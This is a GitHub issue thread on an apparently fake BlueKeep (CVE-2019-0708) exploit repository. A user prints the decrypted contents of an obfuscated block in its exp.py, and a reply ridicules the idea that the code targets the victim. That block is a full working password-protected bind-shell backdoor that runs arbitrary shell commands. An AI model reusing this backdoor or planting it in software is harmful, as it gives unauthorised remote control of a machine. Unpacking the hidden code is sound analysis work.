search

at0mik / CVE-2019-0708-PoC

CVE-2019-0708-PoC It is a semi-functional exploit capable of remotely accessing a Windows computer by exploiting the aforementioned vulnerability, this repository also contains notes on how to complete the attack.
17 stars 6 forks source link

检测到中文 英语 这里代码是什么意思 What does the code mean here? #2

Closed zoujialan closed 5 years ago

zoujialan commented 5 years ago

https://github.com/at0mik/CVE-2019-0708-RCE/blob/58e90e9df15ccb77074900c501da8b72ee8aace8/exp.py#L335 After decryption

import socket import pwd import os import thread import subprocess import sys

PORT=1234 PASS='iamroot123654'

def connection(conn): usr = pwd.getpwuid(os.getuid()).pw_name hst = socket.gethostname() conn.setblocking(1) conn.send("{}@{}'s password: ".format(usr, hst)) passwd = conn.recv(1024) if passwd.strip('\r\n') == PASS: while True: usr = pwd.getpwuid(os.getuid()).pw_name pth = os.getcwd() conn.send('{}[{}] >> '.format(usr, pth)) data = conn.recv(1024) if data.strip('\r\n') == 'quit' or data.strip('\r\n') == 'exit': conn.close() break elif data.strip('\r\n').startswith('killme'): os.system('kill -9 {}'.format(os.getpid())) elif data.strip('\r\n').startswith('cd'): try: os.chdir(data.strip('\r\n')[3:]) except: conn.send('The system path cannot be found!\n') else: proc = subprocess.Popen(data.strip('\r\n'), shell=True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE) stdoutput = proc.stdout.read() + proc.stderr.read() conn.send(stdoutput) else: conn.send('Permission denied (publickey,password).\n') conn.close()

while True: try: s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('', PORT)) s.listen(5) while True: s.settimeout(2) try: conn, addr = s.accept() except socket.timeout: continue

        if(conn):
            s.settimeout(None)
            thread.start_new_thread(connection, (conn,))

except: pass
lanybass commented 5 years ago

意思是,把这一段python代码发到受害者服务器的3389端口。你用大脚趾想想受害者机器有能力执行python代码吗?